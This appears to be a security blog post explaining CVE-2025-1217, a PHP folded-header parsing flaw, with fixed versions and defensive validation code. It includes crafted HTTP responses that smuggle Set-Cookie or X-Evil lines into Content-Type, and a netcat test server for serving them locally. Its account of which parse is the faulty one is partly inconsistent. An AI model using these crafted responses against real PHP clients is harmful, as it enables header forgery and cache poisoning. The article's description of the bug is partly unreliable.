PHP is one of the most widely used server-side languages on the internet. When a severe security bug is found in PHP core, tons of web applications, from small blogs to big e-commerce platforms, are suddenly at risk. That’s why CVE-2025-1217 is such a notable vulnerability, and it’s important for everyone running PHP to understand what it means, how it can be exploited, and how to fix it.
What is CVE-2025-1217?
CVE-2025-1217 is a vulnerability found in PHP’s HTTP module, specifically in its handling of “folded headers” within HTTP responses. Simply put, the bug allows HTTP response headers from a server to be interpreted incorrectly by PHP applications. This misinterpretation can result in using the wrong headers—such as Content-Type—leading to security risks like content sniffing, cache poisoning, or bypassing certain application protections.
What are Folded Headers?
In HTTP/1.x, headers can be "folded" — that means the value of a header can span multiple lines, with each new line beginning with a space or tab. For example:
Some-Header: value1
    value2
Another-Header: value3
Here the second line begins with whitespace, so it continues Some-Header rather than starting a new header; a compliant parser unfolds it to the single value "value1 value2". This is a legacy feature of HTTP, and most modern clients and servers don’t need it; in fact, it’s deprecated. But some systems and proxies still emit or accept folded headers, so a parser must handle them carefully.
The Problem
Before the fixed PHP releases, when a PHP application made an HTTP request (for example with file_get_contents(), curl, or fopen()) and received a response containing folded headers, PHP’s HTTP module parsed those headers incorrectly.
This lets a malicious server craft a response in which some headers are “folded” so that their content gets mixed up with other headers. PHP might assign the wrong value to a header, or pass altered headers along to the application.
Imagine if your application checks for Content-Type: application/json to process a response securely. If an attacker can mess with this header, they might sneak in a malicious payload or trick your app into handling data the wrong way.
Exploit Details and Example
Let’s look at an example. Say your PHP application uses file_get_contents to fetch data from an external server, and it trusts certain headers:
<?php
// Fetch a JSON document, trusting the Content-Type header the remote server reports.
$url = 'http://malicious-server.local/api/data';
$headers = get_headers($url, 1);            // associative array of response headers
$contentType = $headers['Content-Type'] ?? '';
if ($contentType === 'application/json') {
    $data = file_get_contents($url);
    // process $data as JSON
}
?>
A malicious server could send back the following (the Set-Cookie line begins with a space):
HTTP/1.1 200 OK
Content-Type: application/json
 Set-Cookie: hackme=1
Content-Length: 123
Notice the space: the folded line is seen by PHP as part of the previous header’s value, so PHP parses Content-Type as:
application/json Set-Cookie: hackme=1
So $headers['Content-Type'] would no longer equal application/json exactly, as the application expects. Seen the other way round, an attacker can use the same technique to hide headers that PHP then never processes as separate headers, which can lead to unexpected and unsafe behaviour.
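To make the two readings concrete, here is an added example (not code from the article) that runs two small header parsers over the response shown above. The first ignores leading whitespace and so promotes the folded line to a header of its own; the second applies the RFC 7230 obs-fold rule (a line starting with a space or tab continues the previous field value) and can instead refuse such responses outright. The response text is constructed for the demo.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original article. The response below is
// constructed: the third line starts with a space, making it an obs-fold
// continuation of Content-Type under RFC 7230 section 3.2.4.
const SAMPLE_RESPONSE =
    "HTTP/1.1 200 OK\r\n" .
    "Content-Type: application/json\r\n" .
    " Set-Cookie: hackme=1\r\n" .        // leading space: folded continuation
    "Content-Length: 123\r\n" .
    "\r\n";

/** Returns the header lines of a raw response, without the status line. */
function headerLines(string $raw): array
{
    $block = explode("\r\n\r\n", $raw, 2)[0];  // everything before the blank line
    $lines = explode("\r\n", $block);
    array_shift($lines);                        // drop "HTTP/1.1 200 OK"
    return $lines;
}

/** Naive parser: every line is "Name: value"; whitespace around the name is trimmed away. */
function parseNaive(string $raw): array
{
    $out = [];
    foreach (headerLines($raw) as $line) {
        [$name, $value] = array_map('trim', explode(':', $line, 2) + [1 => '']);
        $out[strtolower($name)] = $value;
    }
    return $out;
}

/**
 * RFC-aware parser: a continuation line is appended to the previous value with a
 * single space. With $rejectObsFold = true the response is refused instead, which
 * is the safer choice for a client that cannot afford any ambiguity.
 */
function parseUnfolding(string $raw, bool $rejectObsFold = false): array
{
    $out = [];
    $last = null;
    foreach (headerLines($raw) as $line) {
        if ($line !== '' && ($line[0] === ' ' || $line[0] === "\t")) {
            if ($rejectObsFold || $last === null) {
                throw new UnexpectedValueException('obs-fold line refused: ' . trim($line));
            }
            $out[$last] .= ' ' . trim($line);   // unfold onto the previous header
            continue;
        }
        [$name, $value] = explode(':', $line, 2) + [1 => ''];
        $last = strtolower(trim($name));
        $out[$last] = trim($value);
    }
    return $out;
}

print_r(parseNaive(SAMPLE_RESPONSE));
print_r(parseUnfolding(SAMPLE_RESPONSE));
try {
    parseUnfolding(SAMPLE_RESPONSE, true);
} catch (UnexpectedValueException $e) {
    echo 'strict mode: ', $e->getMessage(), "\n";
}
```

The naive parser reports a Set-Cookie header that the sender wrapped inside Content-Type, while the unfolding parser yields the merged Content-Type value quoted above; two components that disagree on which reading is right is exactly the condition cache poisoning and content-type confusion need. Refusing obs-fold altogether removes the ambiguity and is the behaviour to prefer in a client.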
Try this with a local server
<?php
// Run this script against the local test server below to see how PHP parses folded headers.
$headers = get_headers('http://localhost:808/', 1);
print_r($headers);
?>
Then, spin up a simple server (for example, using netcat)
nc -l 808
Paste this as the HTTP response (the X-Evil line must begin with a space or tab so that it is a folded continuation; the empty line separates the headers from the body)
HTTP/1.1 200 OK
Content-Type: application/json
 X-Evil: yes
Content-Length: 5

hello
After running the PHP script, you’ll see how PHP merges "X-Evil: yes" into the "Content-Type" key.
Real-World Impact
- Header forgery or bypass: An attacker might trick your app into trusting a forged Content-Type.
- Cache poisoning: Caches that key off headers can be poisoned if they interpret headers differently than PHP does.
Fixed Versions
- PHP 8.1 users: 8.1.32+
- PHP 8.4 users: 8.4.5+
Users on other supported branches should upgrade to the corresponding fix release listed in the PHP changelog.
Workaround: Always validate the exact content of the headers you receive, and avoid trusting third-party servers for security-critical logic.
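One way to apply that workaround, as an added example that is not code from the article: validate the associative array returned by get_headers($url, 1) before the body is treated as JSON. Header names are matched case-insensitively (HTTP header names are), repeated headers (which get_headers() returns as an array) are refused as ambiguous, and only an exact application/json media type is accepted, so a value polluted by a folded line fails the check. The sample arrays at the bottom are constructed to mimic get_headers() output; no network request is made to run them.

```php
<?php
declare(strict_types=1);

// Added example, not code from the original article. The sample arrays near
// the end are constructed; fetchJson() is the only part that touches the network.

/**
 * Returns the single, exact JSON media type found in a get_headers()-style
 * array, or throws an UnexpectedValueException describing what was wrong.
 */
function requireJsonContentType(array $headers): string
{
    $found = [];
    foreach ($headers as $name => $value) {
        // Numeric keys hold status lines; string keys hold header names.
        if (is_string($name) && strcasecmp($name, 'Content-Type') === 0) {
            $found = array_merge($found, (array) $value);   // repeated header => array
        }
    }
    if (count($found) !== 1) {
        throw new UnexpectedValueException(
            'expected exactly one Content-Type header, got ' . count($found)
        );
    }
    $type = $found[0];
    // Only application/json, optionally with a UTF-8 charset parameter.
    if (!preg_match('#^application/json(?:\s*;\s*charset="?utf-8"?)?$#i', $type)) {
        throw new UnexpectedValueException('unexpected Content-Type: ' . $type);
    }
    return $type;
}

/** Fetches and decodes $url only if its response headers pass the check above. */
function fetchJson(string $url): mixed
{
    $headers = get_headers($url, true);
    if ($headers === false) {
        throw new RuntimeException('could not read headers from ' . $url);
    }
    requireJsonContentType($headers);
    $body = file_get_contents($url);
    if ($body === false) {
        throw new RuntimeException('could not read body from ' . $url);
    }
    return json_decode($body, true, 512, JSON_THROW_ON_ERROR);
}

// Constructed samples shaped like get_headers($url, 1) output.
$samples = [
    'clean'     => [0 => 'HTTP/1.1 200 OK', 'Content-Type' => 'application/json'],
    'folded'    => [0 => 'HTTP/1.1 200 OK', 'Content-Type' => 'application/json Set-Cookie: hackme=1'],
    'duplicate' => [0 => 'HTTP/1.1 200 OK', 'content-type' => ['application/json', 'text/html']],
];
foreach ($samples as $label => $headers) {
    try {
        echo $label, ': accepted ', requireJsonContentType($headers), "\n";
    } catch (UnexpectedValueException $e) {
        echo $label, ': rejected (', $e->getMessage(), ")\n";
    }
}
```

Only the clean sample passes; the merged value from the folded response and the duplicate header are both refused. Note that get_headers() and file_get_contents() are two separate requests, so a server could answer them differently; if that matters for your application, make a single file_get_contents() call and inspect the $http_response_header array it populates instead, applying the same checks to those lines.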
References
- PHP Changelog 8.1.32
- Security Advisory
- RFC: Deprecating Folded Header Parsing
- CVE-2025-1217 on NVD *(Pending full details)*
Summary
CVE-2025-1217 is serious because it lets attackers play games with how your PHP app understands HTTP headers. Always keep PHP up to date, never trust headers blindly, and keep your software (and the components it depends on) patched. With simple checks and care, you can avoid big headaches down the line.
For more details and full technical info, see the official PHP changelog.
Timeline
Published on: 03/29/2025 06:15:36 UTC
Last modified on: 05/01/2025 19:29:33 UTC